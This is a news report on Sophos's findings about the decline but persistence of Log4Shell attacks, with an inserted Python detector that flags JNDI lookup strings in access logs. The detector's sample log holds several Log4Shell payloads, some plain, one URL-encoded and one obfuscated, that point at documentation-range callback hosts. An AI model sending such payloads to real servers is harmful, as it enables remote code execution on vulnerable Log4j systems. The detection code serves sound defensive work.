The Log4Shell bug that hit numerous online services in December has not resulted in an immediate crisis, according to cybersecurity firm Sophos, which also warned that the vulnerability remains embedded in many applications and products, leaving them a target for exploitation for years to come.
From late December to January 2022, attack attempts flattened out and then declined, the company found from an analysis of its customer data, but attackers still appear to be scanning organisations for vulnerable systems.
The bug stems from Log4j, an open-source Java logging library used by a myriad of online services to record events happening in their applications and on the servers that run them.
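The scanning that the report describes shows up in ordinary web-server access logs, because the exploit string has to be written into a request field (a header, a path, a query parameter) that the target later passes to Log4j. The detector below is an added example and is not from the article or from Sophos: the log lines are constructed, the IP addresses are documentation ranges, and the obfuscation forms it unwraps (`${lower:...}`, `${upper:...}`, `${...:-default}`) are ones commonly seen in scanner traffic rather than an exhaustive list.

```python
"""Flag Log4Shell-style JNDI lookup strings in web-server access logs.

Added example (not from the article or Sophos). Sample log lines are
constructed; source and callback addresses are RFC 5737 documentation ranges.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 1-4 carry
# Log4Shell-style lookups: plain in the User-Agent, in a query string,
# URL-encoded, and obfuscated with nested lookups. Line 5 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [14/Jan/2022:10:01:03 +0000] "GET /login?user=${jndi:rmi://203.0.113.9:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"
198.51.100.4 - - [14/Jan/2022:10:02:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 200 512 "-" "-"
198.51.100.4 - - [14/Jan/2022:10:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.9/a}"
192.0.2.10 - - [14/Jan/2022:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Innermost ${...} lookup (no nested braces inside).
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")

# A JNDI lookup after de-obfuscation: ${jndi:<scheme>://<host[:port]>/...}
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:/*(?P<target>[^/\s}\"']+)",
    re.IGNORECASE,
)


def _resolve_one(m):
    """Resolve a single innermost lookup the way scanners rely on Log4j doing it.

    ${lower:x} -> x lower-cased, ${upper:x} -> x upper-cased,
    ${anything:-default} -> default (the ':-' default syntax).
    Anything else (including the jndi lookup itself) is left untouched.
    """
    body = m.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, _, value = body.partition(":")
    if name == "lower":
        return value.lower()
    if name == "upper":
        return value.upper()
    return m.group(0)


def unwrap_lookups(s, max_rounds=10):
    """Repeatedly resolve innermost lookups until the string stops changing.

    Rounds are bounded so hostile input cannot keep the loop busy forever.
    """
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(_resolve_one, s)
        if new == s:
            break
        s = new
    return s


def find_log4shell_attempts(log_text):
    """Return one record per log line that contains a (de-obfuscated) JNDI lookup.

    Each record carries the line number, the client IP (first field of the
    common log format), and the attacker-controlled callback scheme and host.
    """
    hits = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        if not raw.strip():
            continue
        # URL-decode first (payloads in paths/queries arrive percent-encoded),
        # then peel the nested-lookup obfuscation.
        decoded = unwrap_lookups(unquote(raw))
        m = JNDI_RE.search(decoded)
        if m:
            hits.append({
                "line": lineno,
                "source": raw.split(" ", 1)[0],
                "scheme": m.group("scheme").lower(),
                "target": m.group("target"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        print(hit)
```

The `target` field is the useful output for responders: a callback host that appears here is worth blocking at the egress firewall and searching for in outbound connection logs, since an outbound LDAP, RMI or DNS request to it from an application server is the difference between a scan and a successful exploitation.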
In a report today, Sophos’ principal research scientist Chester Wisniewski said the number of successful attacks making use of the vulnerability has been lower than expected.
One reason was the severity of the bug, which united the digital and security communities and galvanised people into action, he added.
“As soon as details of the Log4Shell bug became clear, the world’s biggest and most important cloud services, software packages and enterprises took action to steer away from the iceberg, supported by shared threat intelligence and practical guidance from the security community,” he noted.
Another factor, he explained, was the need to customise the attack to each application using the vulnerable code. This meant attackers, some of whom were cryptocurrency miners, had to spend time tweaking their malicious code.
However, this does not mean that the threat is over. On the contrary, it is expected to be a long-term issue, given the widespread use of Log4j and the difficulty of patching or updating every affected system.
Some attackers may already have managed to access victims’ servers and set up malware to keep a backdoor open, even as the victims rushed to close the initial loophole, said Wisniewski.
These backdoors might not be used until months later, when the attackers wish to mount a larger attack, he noted, adding that this would be consistent with how other vulnerabilities had been exploited previously.